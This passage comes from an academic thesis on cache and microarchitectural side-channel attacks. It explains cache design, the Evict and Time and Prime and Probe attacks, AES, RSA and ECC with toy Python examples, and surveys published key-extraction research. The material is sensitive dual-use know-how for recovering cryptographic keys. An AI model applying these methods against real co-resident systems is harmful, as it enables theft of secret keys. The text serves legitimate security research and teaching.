
In particular, caches base their functionality on two main principles: spatial locality and temporal locality. While the first principle states that data residing close to the data being accessed is likely to be accessed soon, the latter assumes that recently accessed data is also likely to be accessed again soon.
Caches accomplish temporal locality by storing recently accessed memory blocks, and spatial locality by working with cache lines that load both the needed data and its neighbors into the cache. In consequence, the cache is usually divided into several fixed-size cache lines. However, caches can have very different design characteristics. In the following we describe how their functionality changes for different design choices.

2.2.1.1 Cache Addressing

One of the most important decisions in the design of a cache is how it is organized and addressed. In this sense there are three main design policies:

• Direct mapped caches: Each memory block has a fixed location in the cache, i.e., it can occupy only one specific cache line.

• Fully associative caches: A memory block can occupy any of the cache lines in the cache.

• N-way set associative caches: This is the most common design in modern processors. This design splits the cache into equally sized partitions called cache sets, each holding n cache lines. In this case, a memory block is constrained to occupy one of the n cache lines of a fixed set.

Each of the designs has advantages and disadvantages. For instance, the memory block search in a direct mapped cache is very efficient, as the CPU has to check only one location. In contrast, in a fully associative cache the CPU has to search for a memory block in all the cache lines. However, direct mapped caches suffer from collisions, as consecutive accesses to memory blocks that collide in the same cache line always trigger cache misses. Fully associative caches do not suffer from this problem, as any block can occupy any location in the cache. Thus, it is understandable that the most common choice in modern processors is the n-way set associative cache, as it balances the advantages and disadvantages of the first two designs.
2.2.1.2 Cache Replacement Policy

Another fundamental aspect in the design of n-way set associative caches is the algorithm that selects the block to be evicted within a set. Recall that each set holds n memory blocks, one of which has to be evicted to make room for a new one. The most common algorithms designed for this purpose are:

• Least Recently Used (LRU): This algorithm evicts the memory block that has gone the longest without being accessed, by keeping track of the accesses made to each of the n ways in the set.

• Round Robin: Also known as First-In First-Out (FIFO); evicts the memory block that has resided longest in the cache.

• Pseudo-random: The memory block to be evicted is selected by a pseudo-random algorithm.

Note that, in the case of cache attacks, knowledge of the replacement algorithm might be crucial for the success of the attack. In fact, some cache attacks like Prime and Probe can be challenging to implement under random replacement policies, as the occupancy of the memory blocks in the cache cannot be predicted. In this thesis, we focus on x86-64 architectures, which implement an LRU eviction policy.

2.2.1.3 Inclusiveness Property

The last, but perhaps most important, property that cache designers need to take into account is whether they feature inclusive, non-inclusive or exclusive caches. This has severe implications, among others, for the cache coherency protocol:

• Inclusive caches: Inclusive caches are those that require that any block that exists in the upper level caches (i.e., L1 or L2) also exists in the LLC. Note that this brings several simplifications when it comes to maintaining cache coherency across cores, since the LLC is shared. Thus, the inclusiveness property itself is in charge of keeping coherency between shared memory blocks across CPU cores. The drawback of inclusive caches is the additional cache lines wasted on several copies of the same memory block.
• Exclusive caches: Exclusive caches require that a memory block reside at only one cache level at a time. In contrast to inclusive caches, here the cache coherency protocol has to be implemented with the upper level caches as well. However, exclusive caches do not waste cache space maintaining several copies of the same block.

• Non-inclusive caches: This type of cache imposes no such requirement; a memory block can reside in one or more cache levels at a time.

Whether the cache features the inclusiveness property might also be a key factor when implementing cache attacks. In fact, as will be explained in later sections, attacks like Prime and Probe might only be applicable to inclusive caches, while other attacks like Invalidate and Transfer are agnostic of the inclusiveness property.

2.3 The Cache as a Covert Channel

This thesis presents, among others, the utilization of the LLC as a new covert channel to obtain information from a co-resident user. It is thus important to see how the cache can be utilized as a covert channel to recover information and, in particular, how previous works have done so. The first thing we should clarify for the reader is that knowledge of which set a victim has utilized can lead to key extraction. For instance, key-dependent data that always utilizes the same set can reveal the value of the key being processed if such a utilization of the set is observed. Based on this, research prior to this thesis demonstrating the application of spy processes to core-private resources like the L1 cache to obtain fine-grained information has been based on two main attacks:

2.3.1 The Evict and Time Attack

The Evict and Time attack was presented in [OST06] as a methodology to recover a complete AES key. In particular, the work demonstrated that key-dependent T-table accesses in the AES implementation (see Section 2.4) can lead to knowledge of the key. The methodology can be described as follows:

1.
The attacker performs a full AES encryption with a known, fixed plaintext and an unknown, fixed key. After this step, all the data utilized by the AES encryption resides in the cache.

2. The attacker evicts a specific set in the cache. Note that, if this set was used by the AES process, the data it held will no longer reside in the cache.

3. The attacker performs the same encryption with the same plaintext and key, and measures the time to complete the encryption.

The time spent performing the encryption will highly depend on whether the attacker evicted a set utilized by AES in step 1. If she did, the encryption will take longer, as the data has to be fetched from memory. If she did not, the attacker guesses that the AES encryption does not use the set she evicted, possibly discarding some key candidates.

[Figure 2.4: Evict and Time procedure]

Figure 2.4 graphically represents the states described. The victim first utilizes the yellow memory blocks, while the attacker evicts one of them in the eviction step. When she times the victim's process again, she sees that the victim needed a block from memory and infers that the victim uses the set she evicted. Note that in this case the attacker has to record two encryptions with the same plaintext and key, which might not be entirely realistic. Further, as the leakage comes from the ability to measure the overall encryption time, the attack is not considered overly practical.

2.3.2 The Prime and Probe Attack

The Prime and Probe attack was also proposed in [OST06], and was later utilized by [Acı07, RTSS09, ZJRR12]. In a sense the attack is similar to Evict and Time, but only the monitoring of the attacker's own memory blocks is required. This is a clear advantage, as it yields a more realistic scenario. These are the main steps:

1. The attacker fills the L1 cache with her own junk data.

2. The attacker waits until the victim executes his vulnerable code snippet.
The key-dependent branch/memory access will utilize some of the sets filled by the attacker in the L1.
3. The attacker accesses her own memory blocks again, measuring the time it takes to access them.
If the attacker observes high access times for some of the memory blocks, it means that the targeted software utilized the set where those memory blocks resided. In contrast, if the attacker observes low access times, it means that the set remained untouched during the software execution. This can be utilized to recover AES, RSA or El Gamal keys. Once again, the Prime and Probe steps can be seen graphically in Figure 2.5. The attacker first fills the set with her red memory blocks, then waits for the victim to utilize the cache (yellow block) and finally measures the time to re-access her red memory blocks. In this case she will trigger a miss in the probe step, meaning the victim utilized the corresponding set. Note that the Prime and Probe attack presents a much more practical scenario than Evict and Time, as no measurement of the victim's process is performed. However, as it was only applied in the L1 cache (mainly due to some complications that will be discussed later), the community still did not consider cache attacks practical enough to be performed in real world scenarios.
2.4 Functionality of Commonly Used Cryptographic Algorithms
In this section we review the functionality of the three most widely used cryptographic algorithms in secure systems: AES, RSA and ECC. The goal is to give the reader enough background to understand the attacks that will later be carried out on these ciphers.
2.4.1 AES
AES is one of the most widely used symmetric cryptographic ciphers, a family of ciphers that utilize the same key for encryption and decryption.
Figure 2.5: Prime and Probe procedure
Symmetric cryptography ciphers can clearly provide confidentiality, as they can encrypt a message that only someone with access to the secret key is able to decrypt. Further, symmetric key ciphers can also be utilized in Cipher Block Chaining (CBC) mode for message integrity checking, as symmetric key algorithm based Message Authentication Codes (MACs) can be built [Dwo04]. These ensure that the message does not get modified while being transmitted between two parties. In particular, AES is part of the Rijndael cipher family, and as a block cipher, it processes messages in blocks of 16 bytes. AES is composed of 4 main operations, namely SubBytes, ShiftRows, MixColumns and AddRoundKey. The key can be 128, 192 or 256 bits long, and depending on the length of the key, AES implements 10, 12 or 14 rounds of the 4 main operation stages. The description of these stages is:
•AddRoundKey: In this stage, the round key is XORed with the intermediate state of the cipher.
•SubBytes: A table look-up operation using a 256-entry, 8-bit S-box.
•ShiftRows: In this stage the last three rows of the state are shifted a given number of steps.
•MixColumns: A linear combination of the columns of the state.
Figure 2.6: AES-128 state diagram with respect to its 4 main operations
Every round implements these 4 operations except the last one, in which the MixColumns operation is not issued. Figure 2.6 represents the state diagram of a 10 round AES with respect to these operations. However, cryptographic library designers often decide to merge the SubBytes, ShiftRows and MixColumns operations into table look-up operations and XOR additions. The reason is that, at the cost of bigger table look-ups, the AES encryption is computed faster, as more operations are precomputed.
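The security-relevant consequence of these table look-ups is easiest to see in the last round, which omits MixColumns: each ciphertext byte is then just an S-box (or T-table) output XORed with a last-round key byte, so an attacker who learns which table entry was accessed recovers the key byte directly. A minimal Python sketch of this relation, deriving the standard AES S-box from its GF(2^8) definition; the key and state bytes below are hypothetical values chosen for illustration, not part of any real trace:

```python
def gf_mul(a, b):
    """Multiply in GF(2^8) modulo the AES polynomial x^8 + x^4 + x^3 + x + 1."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        if a & 0x100:
            a ^= 0x11B
        b >>= 1
    return r

def sbox(x):
    """AES S-box: multiplicative inverse in GF(2^8) followed by the affine map."""
    inv = next(y for y in range(256) if gf_mul(x, y) == 1) if x else 0
    out = 0
    for i in range(8):
        bit = ((inv >> i) ^ (inv >> ((i + 4) % 8)) ^ (inv >> ((i + 5) % 8)) ^
               (inv >> ((i + 6) % 8)) ^ (inv >> ((i + 7) % 8)) ^ (0x63 >> i)) & 1
        out |= bit << i
    return out

# Last AES round for one byte: c = S[s] ^ k (no MixColumns).
k = 0x2A                 # hypothetical last-round key byte
s = 0x10                 # hypothetical last-round state byte
c = sbox(s) ^ k          # ciphertext byte the attacker observes
# If a cache attack reveals which S-box entry was read (i.e., s),
# the key byte falls out immediately:
recovered = c ^ sbox(s)
assert recovered == k
```

This one-XOR relation between table index, ciphertext and key is exactly what makes last-round cache leakage so damaging.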
Nevertheless, the memory cost is usually affordable in smartphones, laptops, desktop computers and servers. These tables each hold 256 32-bit values, and usually 4 tables are utilized. We call these the T-tables. Some implementations even utilize a different table for the last round. Figure 2.7 shows an example of the output of 4 bytes in the last round utilizing 4 T-tables. Observe that the T-table entry utilized directly depends on the key and the ciphertext byte, a detail that we will later utilize to perform an attack on the last round. In general, for the scope of microarchitectural attacks, we do not consider implementations based on the Intel AES hardware instructions (AES-NI). These instructions are built into modern processors to perform all the AES operations purely in hardware, i.e., without utilizing the cache hierarchy. Thus, any microarchitectural attack applied to AES-NI would not succeed in obtaining the key.
Figure 2.7: Last round of a T-table implementation of AES
2.4.2 RSA
RSA is the most widely used public key cryptographic algorithm. Public key cryptosystems try to solve the key distribution problem of symmetric cryptography. Note that symmetric key cryptography assumes that both parties share the same secret, but it does not explain how that secret can be shared in the first place. That is exactly where public key cryptography comes into place. In public key (or asymmetric) cryptosystems, in contrast to symmetric key cryptography, each agent in the communication is assumed to have two keys: a public key e and a private key d. The public key is publicly known, while the private key is kept secret. The two keys are related in the sense that one decodes what the other encoded, i.e., D(E(M)) = M and E(D(M)) = M.
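This inverse relation between the two keys can be checked with a textbook-sized example; the numbers below are illustrative and far too small for any real security:

```python
# Toy RSA with textbook-sized parameters -- illustration only.
p, q = 61, 53
n = p * q                      # 3233, the public modulus
phi = (p - 1) * (q - 1)        # 3120
e = 17                         # public exponent, gcd(e, phi) == 1
d = pow(e, -1, phi)            # private exponent (modular inverse, Python 3.8+)

m = 65                         # a "message" < n
c = pow(m, e, n)               # encryption:   E(M) = M^e mod n
assert pow(c, d, n) == m       # decryption:   D(E(M)) = M

s = pow(m, d, n)               # "signature":  D(M) = M^d mod n
assert pow(s, e, n) == m       # verification: E(D(M)) = M
```

Both assertions hold because e and d are inverses modulo φ(n), mirroring the D(E(M)) = M and E(D(M)) = M relations above.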
It is assumed that revealing the public key does not reveal any information that makes it easy to compute D, and therefore only the user holding the private key can decrypt messages encrypted with his public key. Assume the two agents willing to establish a secure communication are Alice and Bob. With public key cryptography, if Alice wants to send an encrypted message to Bob, she will have to encrypt the message with Bob's public key, as the message is then only decryptable with Bob's private key. That is, public key cryptography ensures confidentiality between two communicating agents. The properties of public key cryptosystems also allow a user to digitally sign a message. This signature proves that the sender is indeed who he claims to be, i.e., public key cryptosystems also provide authenticity, a feature that symmetric key algorithms alone cannot claim. For instance, assume that Alice wishes to ensure not only confidentiality but also authenticity of her sent messages. Alice in this case would first sign the message with her own private key, and later encrypt it with Bob's public key: C = E_b(D_a(M)). Upon reception of this ciphertext, Bob would decrypt the message with his own private key (which only he knows) and verify the signature with Alice's public key (proving that only Alice could have signed the message), i.e., M = E_a(D_b(C)). Therefore the communication is not only encrypted but also authenticated. In practice, public key cryptosystems are usually utilized to distribute a shared symmetric key between two agents, such that these can later ensure confidentiality in their communication, since symmetric key cryptography is orders of magnitude faster than public key cryptography. In particular, RSA takes advantage of the practical difficulty of factoring the product of two large prime numbers to build a public key cryptosystem. Its operation is based on modular exponentiations.
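These modular exponentiations are typically computed with variants of the square-and-multiply method, whose secret-dependent control flow is precisely what many of the timing and cache attacks discussed later exploit. A minimal left-to-right sketch (real implementations use windowed variants and countermeasures):

```python
def mod_exp(base, exp, n):
    """Left-to-right square-and-multiply: returns base^exp mod n."""
    r = 1
    for bit in bin(exp)[2:]:     # exponent bits, most significant first
        r = (r * r) % n          # square on every bit
        if bit == '1':
            r = (r * base) % n   # extra multiply only when the bit is set
    return r

# The extra multiply on 1-bits is the classic timing/cache leak:
# each iteration's cost depends on a secret exponent bit.
assert mod_exp(4, 13, 497) == pow(4, 13, 497)
```

Because the multiply is only executed for 1-bits of the (secret) exponent, an observer who can distinguish square-only iterations from square-and-multiply iterations reads the key bit by bit.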
An overview of the key generation algorithm is presented in Algorithm 1, which starts by picking two distinct prime numbers p and q, and calculating n = p∗q and φ(n) = (p−1)∗(q−1). The public key e is chosen such that the greatest common divisor of e and φ(n) is equal to one. Finally, the private key d is chosen as the modular inverse of e with respect to φ(n). The resistance of RSA comes from the fact that, even if the attacker knows n, it is computationally infeasible for him to recover the primes p and q that generated it.

Algorithm 1 RSA key generation given prime numbers p and q
Input: Prime numbers p and q
Output: Public key e and private key d
n = p∗q;
φ(n) = (p−1)∗(q−1);
// Choose e s.t. gcd(e, φ(n)) = 1
d = e^(−1) mod φ(n);
return e, d;

The modular exponentiations themselves are usually implemented with a windowed method, processing w exponent bits per iteration with a table T of precomputed powers of the base:

while i > 0 do
  S = e_i e_(i−1) ... e_(i−w);
  R = R^(2^w) mod N;
  R = R ∗ T[S] mod N;
  i = i − w;
end
return R;

Typical sizes for RSA are 2048 and 4096 bits, while typical window sizes range between 4 and 6. Indeed this is one of the main disadvantages of RSA: a good security level is only achieved with very large keys. The following section describes Elliptic Curve Cryptography (ECC), another public key cryptosystem that provides the same level of security with much smaller key sizes.
Figure 2.8: ECC elliptic curve in which R = P + Q
2.4.3 Elliptic Curve Cryptography
Elliptic Curve Cryptography (ECC) also belongs to the category of public key cryptographic algorithms. As with RSA, each user has a public and private key pair. However, while the security of RSA relies mainly on the large prime factorization problem, ECC relies on the elliptic curve discrete logarithm problem: finding the discrete logarithm of an element in an elliptic curve with respect to a generator is computationally infeasible [HMV03, Mil86, LD00]. In fact, ECC achieves the same level of security as RSA with smaller key sizes. Typical sizes for ECC keys are 256 or 512 bits. The communication peers first have to agree on the ECC curve that they are going to utilize.
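Over a finite field, the geometric addition law described next turns into a handful of modular operations. A toy sketch on the small textbook curve y² = x³ + 2x + 2 over GF(17) (illustrative only, far too small for security), including the ECDH agreement of Figure 2.9; the scalars are hypothetical example keys:

```python
P_MOD, A = 17, 2                 # toy curve y^2 = x^3 + 2x + 2 over GF(17)
G = (5, 1)                       # base point on the curve

def ec_add(P, Q):
    """Point addition; None represents the point at infinity."""
    if P is None: return Q
    if Q is None: return P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2 and (y1 + y2) % P_MOD == 0:
        return None              # P + (-P) = infinity
    if P == Q:                   # tangent slope for doubling
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P_MOD) % P_MOD
    else:                        # chord slope for distinct points
        lam = (y2 - y1) * pow((x2 - x1) % P_MOD, -1, P_MOD) % P_MOD
    x3 = (lam * lam - x1 - x2) % P_MOD
    y3 = (lam * (x1 - x3) - y1) % P_MOD
    return (x3, y3)

def ec_mul(k, P):
    """Double-and-add scalar multiplication k*P."""
    R = None
    while k:
        if k & 1:
            R = ec_add(R, P)
        P = ec_add(P, P)
        k >>= 1
    return R

# ECDH: each peer multiplies the other's public key by its own scalar.
ka, kb = 3, 7                            # hypothetical private scalars
Pa, Pb = ec_mul(ka, G), ec_mul(kb, G)    # public keys
assert ec_mul(ka, Pb) == ec_mul(kb, Pa)  # both obtain ka*kb*G
```

The final assertion is the ECDH agreement: both sides compute the same point ka∗kb∗G without ever exchanging a private scalar.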
A curve is just the set of points defined by an equation, e.g., y² = x³ + ax + b. This equation is called the Weierstrass normal form of elliptic curves. On elliptic curves we define addition arithmetic as follows:
•If P is a point on the curve, −P is just its reflection over the x axis.
•If two points P and Q are distinct, the result of adding P + Q = R is computed by drawing a line crossing P and Q, which will intersect the curve in a third point −R. R is computed by taking the reflection of −R with respect to the x axis.
•P + P is computed by drawing a line tangent to the curve at P, which again will intersect the curve in a third point −2P. 2P is just its reflection over the x axis.
An example of an addition of two distinct points P and Q is presented in Figure 2.8, in which the line crossing P and Q intersects the curve in a third point −R, for which we calculate the negated value by taking its reflection over the x axis.
Figure 2.9: ECDH procedure. k_a ∗ k_b ∗ Q is the shared secret key
With the new ECC point arithmetic we can define, as with RSA, cryptosystems based on the elliptic curve discrete logarithm problem. For all of them we assume the two communication peers agree on a curve and a base point Q on the curve. Each of them chooses a scalar that will be their private key, and computes the public key as k ∗ Q, k being the scalar and Q the base point. Note that the resistance of ECC cryptosystems relies on the fact that, knowing Q and k ∗ Q, it is very difficult to obtain k. With these parameters, Elliptic Curve Diffie-Hellman (ECDH) is easily computable. In fact, both peers can agree on a shared key by computing k_a ∗ P_b and k_b ∗ P_a, where k_i and P_i are the private and public keys of peer i. The entire procedure for ECDH can be observed in Figure 2.9. With similar usage of the ECC properties, digital signatures can also be performed.

Chapter 3 Related Work
The following section provides the state-of-the-art of classical as well as microarchitectural side channel attack literature.
Publications are grouped and discussed to establish a comprehensive overview of the scenarios and covert channels that have been exploited to retrieve sensitive information.
3.1 Classical Side Channel Attacks
Classical side channel attacks were introduced by Kocher et al. [Koc96, KJJ99] almost two decades ago and opened a new era of cryptography research. Before the discovery of side channel attacks, the security of cryptographic algorithms was studied by assuming that adversaries only have black box access to cryptographic devices. As it turned out, this model is not sufficient for real world scenarios, because adversaries additionally have access to a certain amount of internal state information that is leaked through side channels. Typical side channels include the power consumption, electromagnetic emanations and timing of cryptographic devices. In the following we give an overview of how these have been exploited, with respect to timing and power side channel attacks.
3.1.1 Timing Attacks
Timing side channel attacks take advantage of variations in the execution time of security related processes to obtain information about the secret being utilized. These variations can arise due to several factors, e.g., cache line collisions or non-constant execution flows. For instance, Kocher [Koc96] demonstrated that execution time variations due to non-constant execution flow in an RSA decryption can be utilized to obtain information about the private key. Similar instruction execution variations were exploited by Brumley and Boneh [BB03] in a more realistic scenario, i.e., an OpenSSL-based web server. Later, Bernstein [Ber04] instead exploited timing variations stemming from cache set access time differences to recover AES keys. In 2009, Crosby et al. [CWR09] expanded on [Koc96], reducing the jitter effect in the measurements and therefore succeeding in recovering the key with significantly fewer traces. [BB03] was also further expanded in 2011 by Brumley et al.
[BT11], showing that ECC implementations can also suffer from timing variation leakage. Timing attacks have also been shown to recover plaintext messages sent over security protocols like TLS, as demonstrated by Al Fardan and Paterson [FP13].
3.1.2 Power Attacks
Over the last years, several attacks exploiting power side channels have been introduced. In the following, the steps required to perform a successful attack are described.
Measurement
In the first step, the acquisition of one or more side channel traces is performed, which results in discrete time series. The resulting traces represent physical properties of the device during execution, such as the power consumption or the electromagnetic field strength at a certain position.
Pre-processing
In the second, optional step, the raw time series can be enhanced for further processing. In this step several techniques are performed in order to reduce noise, remove redundant information by compressing the data, transform the traces into different representations such as the frequency domain, and align the traces.
Analysis
The actual analysis step extracts information from the acquired traces in order to support the key recovery. There are many more or less complex methods available, which can be categorized by two orthogonal criteria. The first is whether multiple side channel traces are needed or a single trace is sufficient to perform the attack. The second criterion is whether a training device is available to obtain the leakage characteristics, or the attack has to be based on assumptions about the leakage characteristics. Table 3.1 shows the four possible combinations of these criteria.
Table 3.1: Side channel attack classification according to the utilized data analysis method

                | Single Measurement          | Multiple Measurements
Non-Profiling   | Simple Analysis (SPA, SEMA) | Differential Analysis (DPA, DEMA, CPA, MIA, KSA)
Profiling       | Template Attacks (TA)       | Stochastic Approach (SA)

The most basic analysis is the simple power analysis (SPA), which only requires one side channel trace and does not require profiling. The common way to perform this kind of attack is by visual inspection of a plotted trace. The goal is to find patterns in the trace caused by conditional branching that depends on the secret key. This attack works well with computations on large numbers as used in public key cryptography. The differential analysis methods are very powerful, using statistics over multiple side channel traces. These methods do not need a profiling step and use leakage assumptions based on hypothetical internal values that depend on a small part of the key. This way, an attacker can try out different assumptions about a part of the key and compare the corresponding leakage predictions with the actually observable leakage. The statistical methods utilized to quantify the accuracy of the assumption are referred to as distinguishers in the side channel literature. The historically first distinguisher was the distance-of-means test [KJJ99], used by the differential power attack (DPA) and the differential electromagnetic attack (DEMA). Later, more powerful ones were introduced, including Pearson correlation (for CPA) [BCO04], mutual information (MIA) [GBTP08], and the Kolmogorov-Smirnov test (KSA) [WOM11]. Attacks with a profiling step are based upon the assumption that the leakage characteristics of different devices of the same type are similar. Using a training device, an attacker can model the leakage characteristics of the device and use this model for the actual attack. The historically first profiled attack was the template attack (TA) [CRR03].
This method is based on multivariate Gaussian models for all possible sub-keys. Template attacks allow key extraction based on only one side channel trace after proper characterization of a training device. The stochastic approach (SA) [SLP05, KSS10] approximates the leakage function of the device using a linear model. The actual key extraction can be performed by different methods; for example, in [SLP05] the maximum likelihood principle is used. The linear model parameters can also be used to identify leakage sources in a design, as described by De Santis et al. [DSKM+13].
3.2 Microarchitectural Attacks
Microarchitectural attacks exploit specific features of computer microarchitectures to recover cryptographic keys without requiring physical access to the device, by observing the footprint that other processes leave on shared hardware; co-located cloud users are therefore a natural target. The focus of this section is put on the hardware components that have been exploited in microarchitectural attacks, which have exhibited a significant shift towards multi-core/multi-CPU systems. A rough description of the basic components in modern microarchitectures was presented in Figure 2.2. Modern computers usually consist of one or more CPU sockets, each containing several CPU cores. Processes are executed in one or several cores at the same time. The Branch Prediction Unit (BPU) is in charge of making predictions on the possible outcomes of branches inside the code being executed. The L1/L2 and L3 caches store data and instructions that have recently been used, because they are very likely to be utilized again, thereby avoiding subsequent DRAM accesses. The memory bus is in charge of the communication between the cache hierarchy and the DRAM, and can further be used to communicate the state of shared memory across CPU sockets. Finally, the DRAM holds the memory pages that are necessary for the execution of the program.
It is particularly important for microarchitectural attacks to identify which of these components can serve as a covert channel to perform single-core, cross-core and cross-CPU attacks. In fact, from the figure we can identify many of the covert channels that will be explained later. For instance, it can be observed that an attacker trying to exploit Branch Prediction Units (BPUs) or L1/L2 caches has to co-reside in the same core as the victim, as they are core-private resources. A cross-core attack can be implemented if the L3 cache is utilized as the covert channel, since it is shared across cores. Finally, attacks across CPU sockets can be achieved by exploiting, among other components, the memory bus and the DRAM. All of these have been exploited in very different manners, which will be explained in the following sections.
3.2.1 Hyper-threading
Hyper-threading technology was introduced by Intel in 2002 to perform multiple computations in parallel. Each processor core has two virtual threads that share the work load of a process. The main purpose of hyper-threading is to increase the number of independent instructions in the pipeline. In 2005, Percival [Per05] exploited this technology to establish a cache covert channel in the L1 data cache. A spy process and a cryptographic library are executed in the same core but in different threads, and the spy code is able to recover some bits of the secret RSA exponent. In 2007, Aciicmez et al. [AS07] proposed a new method to exploit the leakage in the hyper-threading technology of Intel processors. To do so, they take advantage of the ALU's large parallel integer multiplier, shared between the two threads in a processor core. Even though they did not introduce a new vulnerability in the OpenSSL library, they showed that it is possible to use the ALU as a covert channel during the secret exponent computation.
3.2.2 Branch Prediction Unit Attacks
Control hazards have an increasing impact on the performance of a CPU as the pipeline depth increases.
Efficient handling of speculative execution of instructions becomes a critical solution against control hazards. This efficiency is usually achieved by predicting the most likely execution path, i.e., by predicting the most likely outcome of a branch. Specifically, Branch Prediction Units (BPUs) are in charge of predicting the most likely path that a branch will take. BPUs are usually divided into two main pieces: the Branch Target Buffer (BTB) and the predictor. The BTB is a buffer that stores the addresses of the most recently processed branches, while the predictor is in charge of making the most likely prediction of the path. As BPUs are accessible by any user within the same core, the BTB has become a clear target for microarchitectural attacks. Imagine a BPU in which branches that are not present in the BTB are always predicted as not taken, and are only loaded into the BTB once the branch is taken. If a piece of code has a security critical branch to be predicted, a malicious user can interact with the BTB (i.e., by filling it) to ensure that the branch will be predicted as not taken. If the attacker is able to measure the execution time of the piece of code, he will be able to tell whether the branch was mispredicted (i.e., the branch was taken) or correctly predicted (i.e., the branch was not taken). This is only one possible attack vector that can be implemented against the BPU. A more realistic scenario is one in which the attacker fills the BTB with always-taken branches (which evicts any existing branches from the BTB), then waits for the victim to execute his security critical branch, and finally measures the time to execute his always-taken branches again. If the security critical branch was taken, it will be loaded into the BTB and one of the attacker's branches will be evicted, causing a misprediction that he will observe in the measured time.
On the other hand, if the security critical branch was not taken, it will not be loaded into the BTB and the attacker will predict all his branches correctly. The two attack models discussed have been proposed in [AKKS07, AKS07]. However, BPU microarchitectural attacks have a clear disadvantage when compared to other microarchitectural attacks: BPUs are core-private resources. Thus, these attacks are only applicable if attacker and victim co-reside in the same core. Nevertheless, new scenarios arise in which core co-residency is easily achievable, such as TEE attacks (discussed in Section 3.2.12). Malicious OSs can control the scheduling and the CPU affinity of each process. In fact, attacks utilizing the BPU have already been proposed in that scenario [LSG+16].
3.2.3 Out-of-order Execution Attacks
A recently discovered microarchitectural side channel that was proved to establish communication between co-resident VMs is the exploitation of out-of-order instruction execution [D'A15]. Out-of-order execution of instructions is an optimization, present in almost all processors, that allows a later instruction to complete while waiting for the result of a previous instruction. A first intuition that out-of-order instructions finish earlier than in-order instructions was given in [CVBS09]. As with other microarchitectural attacks, such optimizations can indeed open new covert channels that can be exploited by malicious attackers. Assume two threads execute interdependent load and store operations on a shared variable (i.e., one thread stores the value loaded by the other one). If these threads run in parallel, three cases might arise: both threads are executed in-order and at the same time, both threads are executed in-order but one is executed faster, or the threads execute instructions out of order. Note that the result of the operations will be different in each of these cases.
Thus, a covert channel can be established by transmitting a 0 when instructions are executed out of order, and a 1 in any other case. Indeed, an attacker can ensure that a 1 is transmitted by utilizing memory barrier instructions, which keep the execution of the instructions in-order.
3.2.4 Performance Monitoring Units
Performance Monitoring Units (PMUs) are a set of special-purpose registers that store the counts of hardware and software related activities. In 1997, the first study was conducted by Ammons et al. [ABL97], where the logical structure of hardware counters is explained in order to profile different benchmarks. In 2008, Uhsadel et al. [UGV08] showed that hardware performance counters can be used to perform cache attacks by looking at the L1 and L2 D-cache misses. In 2013, Weaver et al. [WTM13] investigated x86_64 systems to analyze deterministic counter events, concluding that non-x86 hardware has more deterministic counters. In 2015, Bhattacharya et al. [BM15] showed how to use the branch prediction events in hardware performance counters to recover 1024-bit RSA keys on Intel processors.
3.2.5 Special Instructions
The set of instructions that a CPU can understand and execute is referred to as its instruction set architecture (ISA). Although usually composed of common instructions (e.g., mov or add), some ISAs include a set of special instructions that implement system functionalities the system cannot provide by itself. One example concerns CPUs that lack memory coherence protocols. In these cases, special instructions are needed to handle conflicting (thus incoherent) values between the DRAM and the cache hierarchy. For instance, the Intel x86_64 ISA provides the clflush instruction for this purpose. The clflush instruction evicts the desired data from the cache hierarchy, thus making sure that the next fetch of that data will come from the DRAM. Since ARMv8, ARM processors have started including similar instructions in their ISA.
Although these instructions can be crucial for certain processors, they also serve as helpers to implement microarchitectural attacks. In fact, an attacker often wants to evict a shared variable from the cache, either to reload it later [YF14, LGS+16, IES16], to measure the flushing time [GMWM16], or to access the DRAM continuously [KDK+14a]. A similar situation can be observed with the instructions added to utilize hardware random number generators. In particular, it has recently been shown that, due to the low throughput of the special rdseed instruction, a covert channel can be implemented by transmitting different bits depending on whether rdseed is exhaustively used or not [EP16].
3.2.6 Hardware Caches
Modern cache structures, as shown in Figure 2.2, are usually divided into core-private L1 instruction and data caches, and at least one level of unified, core-shared LLC. The instruction cache (I-cache) is the part of the L1 cache responsible for storing instructions recently executed by the CPU. In 2007, Aciicmez [Acı07] showed the applicability of I-cache attacks by exploiting the cipher's instruction accesses to recover a 1024-bit RSA secret key. The monitored I-cache sets are filled with dummy instructions by a spy process whose accesses are later timed to recover an RSA decryption key. One year later, Aciicmez et al. [AS08] demonstrated the power of I-cache attacks on OpenSSL RSA decryption processes that use the Chinese Remainder Theorem (CRT), Montgomery's multiplication algorithm and blinding for the modular exponentiation. In 2010, Aciicmez et al. [ABG10] revisited I-cache attacks. In this work, the attack is automated by using Hidden Markov Models (HMMs) and vector quantization to attack OpenSSL's DSA implementation. In 2012, Zhang et al. [ZJRR12] published a paper on cross-VM attacks within the same core using the L1 data cache. The attack targets Libgcrypt's ElGamal decryption process to recover the secret key.
To eliminate the noise, a Support Vector Machine (SVM) is applied to classify square, multiplication and modular reduction operations from the L1 data cache accesses. The output of the SVM is given to an HMM to further reduce the noise and increase the reliability of the method. This paper demonstrates the first attack in a cross-VM setup using the L1 data cache. Finally, in 2016, Zankl et al. [ZHS16] proposed an automated method to find I-cache leakage in the RSA implementations of various cryptographic libraries. The correlation technique shows that there are still many libraries that are vulnerable to I-cache attacks. The data cache stores recently accessed data and, as with the I-cache, it has been widely exploited to recover sensitive information. As early as 2005, Percival [Per05] demonstrated the usage of the L1 data cache as a covert channel to extract information from core co-resident processes. To demonstrate the efficiency of the side channel, the OpenSSL RSA implementation was targeted. The main reason for the leakage is that the different precomputed multipliers are loaded into different L1 data cache lines. By profiling each corresponding set it is possible to recover more than half of the bits of the secret exponent. A year later, Osvik et al. [OST06] presented the Prime and Probe and Evict and Time attacks, which were utilized to recover AES cryptographic keys. In 2007, Neve et al. [NS07] showed that it is possible to use the L1 data cache as a side channel in single-threaded processors by exploiting the OS scheduler. This technique was applied to the last round of OpenSSL's AES implementation, where only one T-table is used. The authors recovered the last round key with 20 ciphertext/access pairs. In 2009, a new type of attack was presented by Brumley et al. [BH09], where L1 data cache templates are implemented to recover OpenSSL ECC decryption keys. The goal of this method is to automate cache attacks by applying HMMs and vector quantization, demonstrated on the Pentium 4 and Intel Atom.
Finally, in 2011, Gullasch et al. [GBK11] presented the Flush and Reload attack, although the attack would acquire its name later. The study demonstrated that it is possible to exploit Linux' Completely Fair Scheduler (CFS) to interrupt the AES thread and recover the AES encryption key with very few encryptions.
LLC attacks
